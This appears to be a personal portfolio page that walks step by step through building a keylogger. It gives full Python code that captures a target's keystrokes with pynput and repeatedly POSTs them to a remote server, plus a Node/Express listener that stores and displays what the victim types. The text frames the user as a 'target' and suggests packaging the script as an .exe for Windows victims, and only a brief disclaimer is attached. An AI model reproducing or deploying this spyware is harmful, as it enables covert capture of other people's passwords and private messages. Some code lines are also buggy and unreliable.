{% extends "base.html" %} {% block title %}João Buschinelli - Projects{% endblock %}

{% block content %}
<h1 id="typing-effect" class="display-2 mb-4"></h1>
<br>
<h2>Description</h2>

<p class="solution-text no-indent">
    This is a simple keylogger project that combines JavaScript, Python and a remote server to track keyboard keys pressed on a computer. 
    First we need to setup a remote server to print the keys pressed in the target pc. With the IP address of the server and the listening port,
    I've programmed a Python script that dumps json payloads and send it through a POST request to the remote server. The payloads are created when 
    the target press any key.
</p>

<h3>Building the Python script</h3>

<p class="solution-text no-indent">
    In this first script, we define a <code class="hljs language-python"><span class="hljs-title">text</span></code> variable that records the keys pressed that way. In order to listen to the 
    key pressed, we need to use <code class="hljs language-python"><span class="hljs-keyword">pynput</span></code> library. This library lets us 
    record keyboard keys pressed.
</p>

<p class="solution-text no-indent">
    We start by defining some functions. The idea here is to create a function that will make the post request, then another function that concatenates
    to our <code class="hljs language-python"><span class="hljs-title">text</span></code> the key pressed, given this key as input. We shall call these two functions as
    <code class="hljs language-python"><span class="hljs-title _function">post_request</span></code> and <code class="hljs language-python"><span class="hljs-title _function">key_down</span></code>.
    We also want to add a <code class="hljs language-python"><span class="hljs-title _function">main</span></code> function.
</p>

<p class="solution-text no-indent">
    The first part of the code should look like this:
</p>

<div class="shrink">
    <pre>
        <code id="text" class="hljs language-python">
            <span class="hljs-keyword">from</span> pynput <span class="hljs-keyword">import</span> keyboard
            <span class="hljs-keyword">import</span> requests
            <span class="hljs-keyword">import</span> json
            <span class="hljs-keyword">import</span> threading
            <span class="hljs-keyword">import</span> optparse   
            
            <span class="hljs-keyword">def</span> <span class="hljs-title _function">post_request</span>():
                <span class="hljs-keyword">pass</span>

            <span class="hljs-keyword">def</span> <span class="hljs-title _function">key_down</span>(key):
                <span class="hljs-keyword">pass</span>

            <span class="hljs-keyword">def</span> <span class="hljs-title _function">main</span>():
                <span class="hljs-keyword">pass</span>
        </code>
    </pre>
</div>

<p class="solution-text no-indent">
    Now that everything is setup, we can start writing up some code. Let's edit the key_down function. In order to track the keys, we need
    a string variable, which we shall call 'text'. This string is going to be concatenated everytime a key is pressed. Everytime this variable
    is updated, we have to use it in our post_request function to send it to our remote server. Following this idea, we have to make it a global
    variable. After that, we start concatenating this string using the keyboard class inside pynput package. We need to track every possible key then
    concatenating it to our variable. To do so, we need several if and elif statements. Everytime a key is pressed, the global variable 'text' is going
    to be updated. This is what the code looks like:
</p>

<div class="shrink">
    <pre>
        <code id="text" class="hljs language-python">
            <span class="hljs-keyword">from</span> pynput <span class="hljs-keyword">import</span> keyboard
            <span class="hljs-keyword">import</span> requests
            <span class="hljs-keyword">import</span> json
            <span class="hljs-keyword">import</span> threading
            <span class="hljs-keyword">import</span> optparse   
            
            <span class="hljs-keyword">def</span> <span class="hljs-title _function">post_request</span>():
                <span class="hljs-keyword">pass</span>

            <span class="hljs-keyword">def</span> <span class="hljs-title _function">key_down</span>(key):
                <span class="hljs-keyword">global</span> text

                <span class="hljs-keyword">if</span> key == keyboard.Key.enter:
                    text += <span class="hljs-string">"\n"</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.tab:
                    text += <span class="hljs-string">"\t"</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.space:
                    text += <span class="hljs-string">" "</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.backspace <span class="hljs-keyword">and</span> <span class="hljs-title _function">len</span>(text) > <span class="hljs-number">0</span>:
                    text -= text[:<span class="hljs-number">-1</span>]
                <span class="hljs-keyword">elif</span> key == keyboard.Key.backspace <span class="hljs-keyword">and</span> <span class="hljs-title _function">len</span>(text) == <span class="hljs-number">0</span>:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.ctrl_l <span class="hljs-keyword">or</span> key == keyboard.Key.ctrl_r:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.shift:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.f5:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.cmd:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.esc:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">else</span>:
                    text += <span class="hljs-title _function">str</span>(key).<span class="hljs-title _function">strip</span>(<span class="hljs-string">"'"</span>)

            <span class="hljs-keyword">def</span> <span class="hljs-title _function">main</span>():
                <span class="hljs-keyword">pass</span>   
        </code>
    </pre>
</div>

<p class="solution-text no-indent">
    Since our 'text' variable is globally defined, it can be accessed through all other functions we define, allowing our key_down function to be a "void" method (for those who are fond of C language).
</p>

<p class="solution-text no-indent">
    Now that our 'text' variable is tracking several possible keys pressed, let's move to our main function. Here we want to use a listener that will fetch
    each key pressed down and then call our post_request function (yet to be coded). The pynput package has a listener inside the keyboard class. We assign to
    a 'on_press' parameter our key_down method, and then the listener will fetch each key pressed while the target is online. After calling the post_request function,
    We then use the 'join' method of the listener to collect all events until the key is released. The main function should look like this:
</p>

<div class="shrink">
    <pre>
        <code id="text" class="hljs language-python">
            <span class="hljs-keyword">from</span> pynput <span class="hljs-keyword">import</span> keyboard
            <span class="hljs-keyword">import</span> requests
            <span class="hljs-keyword">import</span> json
            <span class="hljs-keyword">import</span> threading
            <span class="hljs-keyword">import</span> optparse   
            
            <span class="hljs-keyword">def</span> <span class="hljs-title _function">post_request</span>():
                <span class="hljs-keyword">pass</span>

            <span class="hljs-keyword">def</span> <span class="hljs-title _function">key_down</span>(key):
                <span class="hljs-keyword">global</span> text

                <span class="hljs-keyword">if</span> key == keyboard.Key.enter:
                    text += <span class="hljs-string">"\n"</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.tab:
                    text += <span class="hljs-string">"\t"</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.space:
                    text += <span class="hljs-string">" "</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.backspace <span class="hljs-keyword">and</span> <span class="hljs-title _function">len</span>(text) > <span class="hljs-number">0</span>:
                    text -= text[:<span class="hljs-number">-1</span>]
                <span class="hljs-keyword">elif</span> key == keyboard.Key.backspace <span class="hljs-keyword">and</span> <span class="hljs-title _function">len</span>(text) == <span class="hljs-number">0</span>:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.ctrl_l <span class="hljs-keyword">or</span> key == keyboard.Key.ctrl_r:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.shift:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.f5:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.cmd:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.esc:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">else</span>:
                    text += <span class="hljs-title _function">str</span>(key).<span class="hljs-title _function">strip</span>(<span class="hljs-string">"'"</span>)

            <span class="hljs-keyword">def</span> <span class="hljs-title _function">main</span>():
                <span class="hljs-keyword">with</span> keyboard.Listener(on_press=key_down) <span class="hljs-keyword">as</span> listener:
                    <span class="hljs-title _function">post_request</span>()
                    listener.<span class="hljs-title _function">join</span>() 
        </code>
    </pre>
</div>

<p class="solution-text no-indent">
    We only need to write the post_request function and add some options using optparse package afterwards. The post_request function is responsible for sending
    our text variable to the remote server through a POST request. Since our server is going to be running at some IP and listening at some port, we shall define
    two global variables: 'ip' and 'port'. We also want to define another global variable called 'interval' which is responsible to wait for a certain amount of seconds
    before each request. Since our payload is better interpreted as json, we also need to add a header to these requests, with the 'Content-Type' being 'application/json'. Then,
    we define a timer variable which is responsible to call our post_request function after 'interval' amount of seconds has passed. This looks like the following: 
</p>

<div class="shrink">
    <pre>
        <code id="text" class="hljs language-python">
            <span class="hljs-keyword">from</span> pynput <span class="hljs-keyword">import</span> keyboard
            <span class="hljs-keyword">import</span> requests
            <span class="hljs-keyword">import</span> json
            <span class="hljs-keyword">import</span> threading
            <span class="hljs-keyword">import</span> optparse   
            
            <span class="hljs-keyword">def</span> <span class="hljs-title _function">post_request</span>():
                <span class="hljs-keyword">global</span> ip
                <span class="hljs-keyword">global</span> port
                <span class="hljs-keyword">global</span> interval

                <span class="hljs-keyword">try</span>:
                    payload = json.dumps({"keyboardData": text})
                    r = requests.post(
                        <span class="hljs-literal">f</span><span class="hljs-string">"https://{ip}:{port}"</span>, data=payload,
                        headers={"Content-Type": "application/json"}
                    )
                    timer = threading.Timer(interval, post_request)
                    timer.start()
                <span class="hljs-keyword">except</span>:
                    <span class="hljs-title _function">print</span>("[!] Request failed.")

            <span class="hljs-keyword">def</span> <span class="hljs-title _function">key_down</span>(key):
                <span class="hljs-keyword">global</span> text

                <span class="hljs-keyword">if</span> key == keyboard.Key.enter:
                    text += <span class="hljs-string">"\n"</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.tab:
                    text += <span class="hljs-string">"\t"</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.space:
                    text += <span class="hljs-string">" "</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.backspace <span class="hljs-keyword">and</span> <span class="hljs-title _function">len</span>(text) > <span class="hljs-number">0</span>:
                    text -= text[:<span class="hljs-number">-1</span>]
                <span class="hljs-keyword">elif</span> key == keyboard.Key.backspace <span class="hljs-keyword">and</span> <span class="hljs-title _function">len</span>(text) == <span class="hljs-number">0</span>:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.ctrl_l <span class="hljs-keyword">or</span> key == keyboard.Key.ctrl_r:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.shift:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.f5:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.cmd:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.esc:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">else</span>:
                    text += <span class="hljs-title _function">str</span>(key).<span class="hljs-title _function">strip</span>(<span class="hljs-string">"'"</span>)

            <span class="hljs-keyword">def</span> <span class="hljs-title _function">main</span>():
                <span class="hljs-keyword">with</span> keyboard.Listener(on_press=key_down) <span class="hljs-keyword">as</span> listener:
                    <span class="hljs-title _function">post_request</span>()
                    listener.<span class="hljs-title _function">join</span>() 
        </code>
    </pre>
</div>

<p class="solution-text no-indent">
    Now that everything is done, we just need to provide this script the ip and port of our remote server. Let's make it such that it is interactable with
    the user by using optparse package. Wrapping everything up, we have the following script:
</p>

<div class="shrink">
    <pre>
        <code id="text" class="hljs language-python">
            <span class="hljs-keyword">from</span> pynput <span class="hljs-keyword">import</span> keyboard
            <span class="hljs-keyword">import</span> requests
            <span class="hljs-keyword">import</span> json
            <span class="hljs-keyword">import</span> threading
            <span class="hljs-keyword">import</span> optparse   
            
            <span class="hljs-keyword">def</span> <span class="hljs-title _function">post_request</span>():
                <span class="hljs-keyword">global</span> ip
                <span class="hljs-keyword">global</span> port
                <span class="hljs-keyword">global</span> interval

                <span class="hljs-keyword">try</span>:
                    payload = json.dumps({"keyboardData": text})
                    r = requests.post(
                        <span class="hljs-literal">f</span><span class="hljs-string">"https://{ip}:{port}"</span>, data=payload,
                        headers={"Content-Type": "application/json"}
                    )
                    timer = threading.Timer(interval, post_request)
                    timer.start()
                <span class="hljs-keyword">except</span>:
                    <span class="hljs-title _function">print</span>("[!] Request failed.")

            <span class="hljs-keyword">def</span> <span class="hljs-title _function">key_down</span>(key):
                <span class="hljs-keyword">global</span> text

                <span class="hljs-keyword">if</span> key == keyboard.Key.enter:
                    text += <span class="hljs-string">"\n"</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.tab:
                    text += <span class="hljs-string">"\t"</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.space:
                    text += <span class="hljs-string">" "</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.backspace <span class="hljs-keyword">and</span> <span class="hljs-title _function">len</span>(text) > <span class="hljs-number">0</span>:
                    text -= text[:<span class="hljs-number">-1</span>]
                <span class="hljs-keyword">elif</span> key == keyboard.Key.backspace <span class="hljs-keyword">and</span> <span class="hljs-title _function">len</span>(text) == <span class="hljs-number">0</span>:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.ctrl_l <span class="hljs-keyword">or</span> key == keyboard.Key.ctrl_r:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.shift:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.f5:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.cmd:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">elif</span> key == keyboard.Key.esc:
                    <span class="hljs-keyword">pass</span>
                <span class="hljs-keyword">else</span>:
                    text += <span class="hljs-title _function">str</span>(key).<span class="hljs-title _function">strip</span>(<span class="hljs-string">"'"</span>)

            <span class="hljs-keyword">def</span> <span class="hljs-title _function">main</span>():
                <span class="hljs-keyword">with</span> keyboard.Listener(on_press=key_down) <span class="hljs-keyword">as</span> listener:
                    <span class="hljs-title _function">post_request</span>()
                    listener.<span class="hljs-title _function">join</span>() 

            <span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:
                text = ""
                parser = optparse.OptionParser(<span class="hljs-string">"Usage: program.py -i &lt;ip address&gt; -p &lt;port&gt;"</span>)
                parser.add_option('-i', dest='ip', type='string', help='Set the remote server IP')
                parser.add_option('-p', dest='port', type='string', help='Set the remote server port.')
                parser.add_option('-t', dest='interval', type='string', help='Time interval between each thread. Default is 10 seconds.', default='10')
                (options, args) = parser.parse_args()

                ip = options.ip
                port = options.port
                interval = int(options.interval)

                <span class="hljs-keyword">if</span> ip == None or port == None:
                    print(parser.usage)
                    exit(0)

                <span class="hljs-title _function">main</span>()
        </code>
    </pre>
</div>

<p class="solution-text no-indent">
    And the script is done.
</p>

<h3>Setting up the Remote Server</h3>

<p class="solution-text no-indent">
For the purpose of this project, it is necessary to setup a remote server that our Python script will talk to. I recommend installing
Ubuntu or Debian based OS, since it is easier to install all required softwares. Of course, it is also possible to use MacOS or a Windows
server machine. We can install these softwares manually or with Python. Independently of how we choose to install the dependencies, these are the
commands we need to run in the remote server terminal (for Linux):
</p>

<div class="shrink">
    <pre>
        <code id="text" class="hljs language-plain">
            sudo apt updated
            sudo apt upgrade
            sudo apt install nodejs
            sudo apt install npm
            sudo npm init -y
            sudo npm install
            sudo npm install prompt-sync
            sudo reboot
        </code>
    </pre>
</div>

<p class="solution-text no-indent">
    In order to talk to our Python script, it is also necessary to write some code that interprets what our keylogger is sending
    to the listening port. We installed these softwares to run the JavaScript code that will be responsible for that, as well as the 
    Express web framework module.
</p>

<h2>JavaScript Listener</h2>

<p class="solution-text no-indent">
    Now we are ready to write our last script. We want to write a JavaScript code that will fetch the POST requests sent by our Python script malware.
    This script, however, should be ran inside our remote server, differently from our Python script that runs inside the target machine. This piece
    of code is only responsible to interpret and display in our server what the target is typing. We start by importing the libraries needed:
</p>


<div class="shrink">
    <pre>
        <code id="text" class="hljs language-javascript">
            const fs = require("fs");
            const express = require("express");
            const prompt = require("prompt-sync")({ sigint: true });

            const port = prompt("Enter listening port: ");
            const app = express();

            app.use(express.json({ extended: true }));
        </code>
    </pre>
</div>

<p class="solution-text no-indent">
    First three lines are just defining the libraries. In the port constant, we ask for the user to input the listening port of the server (this should be
    the same port as we input in the Python script). The app constant creates an Express application instance, which will be used to handle HTTP requests.
    The last line sets up middleware for the application, specifically for parsing JSON data that is sent in the request body. 
    The extended option, when set to true, allows for more complex objects to be encoded as JSON. We now need to add two endpoints: a GET and POST endpoints.
    Let's tart with the GET endpoint:
</p>

<div class="shrink">
    <pre>
        <code id="text" class="hljs language-javascript">
            const fs = require("fs");
            const express = require("express");
            const prompt = require("prompt-sync")({ sigint: true });

            const port = prompt("Enter listening port: ");
            const app = express();

            app.use(express.json({ extended: true }));

            app.get("/", (req, res) => {
                try {
                    const file = fs.readFileSync("./keyboard_log.txt", {encoding: 'utf8', flag: 'r' });
                    res.send(`&lt;h1&gt;Logger&lt;/h1&gt;&lt;p&gt;${file.replace("\n", "&lt;br&gt;")}`);
                } catch {
                    res.send("&lt;h1&gt;Nothing logged&lt;/h1&gt;");
                }
            })
        </code>
    </pre>
</div>

<p class="solution-text no-indent">
    The GET endpoint retrieves the contents of a file named "keyboard_log.txt", and returns it to the client as an HTML 
    page with a header and the contents of the file, separated by line breaks. 
    If the file does not exist, it returns a message saying that there is nothing logged.
</p>

<p class="solution-text no-indent">
    Now we write the POST endpoint:
</p>

<div class="shrink">
    <pre>
        <code id="text" class="hljs language-javascript">
            const fs = require("fs");
            const express = require("express");
            const prompt = require("prompt-sync")({ sigint: true });

            const port = prompt("Enter listening port: ");
            const app = express();

            app.use(express.json({ extended: true }));

            app.get("/", (req, res) => {
                try {
                    const file = fs.readFileSync("./keyboard_log.txt", {encoding: 'utf8', flag: 'r' });
                    res.send(`&lt;h1&gt;Logger&lt;/h1&gt;&lt;p&gt;${file.replace("\n", "&lt;br&gt;")}`);
                } catch {
                    res.send("&lt;h1&gt;Nothing logged&lt;/h1&gt;");
                }
            });

            app.post("/", (req, res) => {
                console.log(req.body.keyboardData);
                fs.writeFileSync("keyboard_log.txt", req.body.keyboardData);
                res.send("[+] Data successfully set.");
            });
        </code>
    </pre>
</div>

<p class="solution-text no-indent">
    The POST endpoint logs data from the client to the "keyboard_log.txt" file. The data is sent in the body of the request. Then, the server takes 
    the data and writes it to the file. If the file does not exist, it creates the file and writes to it. Now we just need to set up a listener to our app:
</p>

<div class="shrink">
    <pre>
        <code id="text" class="hljs language-javascript">
            const fs = require("fs");
            const express = require("express");
            const prompt = require("prompt-sync")({ sigint: true });

            const port = prompt("Enter listening port: ");
            const app = express();

            app.use(express.json({ extended: true }));

            app.get("/", (req, res) => {
                try {
                    const file = fs.readFileSync("./keyboard_log.txt", {encoding: 'utf8', flag: 'r' });
                    res.send(`&lt;h1&gt;Logger&lt;/h1&gt;&lt;p&gt;${file.replace("\n", "&lt;br&gt;")}`);
                } catch {
                    res.send("&lt;h1&gt;Nothing logged&lt;/h1&gt;");
                }
            });

            app.post("/", (req, res) => {
                console.log(req.body.keyboardData);
                fs.writeFileSync("keyboard_log.txt", req.body.keyboardData);
                res.send("[+] Data successfully set.");
            });

            app.listen(port, () => {
                console.log(`[-] Listening on port ${port}`);
            });
        </code>
    </pre>
</div>

<p class="solution-text no-indent">
    When we run this code, the app starts listening on the port number specified by the user.
</p>

<h3>Final considerations</h3>

<p class="solution-text no-indent">
    This is a simple keylogger project that needs more sharpening. It is a front-door to a much robust keylogger and it is only
    meant to illustrate how to build a connection between a target and a remote server using Python and JavaScript. These two endpoints
    talk to each other by sending HTTP requests. All the pressed keys in the target pc is logged into the remote server root page in HTML format,
    synchronously. What is being typed by the target is going to show on the attacker screen as long as the target is online and the Python script
    is running. The first drawback of this code is that the target needs to have Python installed, as well as all the packages used in the script. 
    Another drawback is that the target needs to run the script in order to be vulnerable to it. There are a few ways to bypass this, one of each
    is by making the .py file to be an executable file .exe (if target uses a Windows machine). However, the target still needs to have Python installed.
    
</p>

<h2>Disclaimer</h2>
WARNING! This project must not be used for malicious purposes. It is simply a project to show how keyloggers work in remote servers. Use at your own risk.




{% endblock %}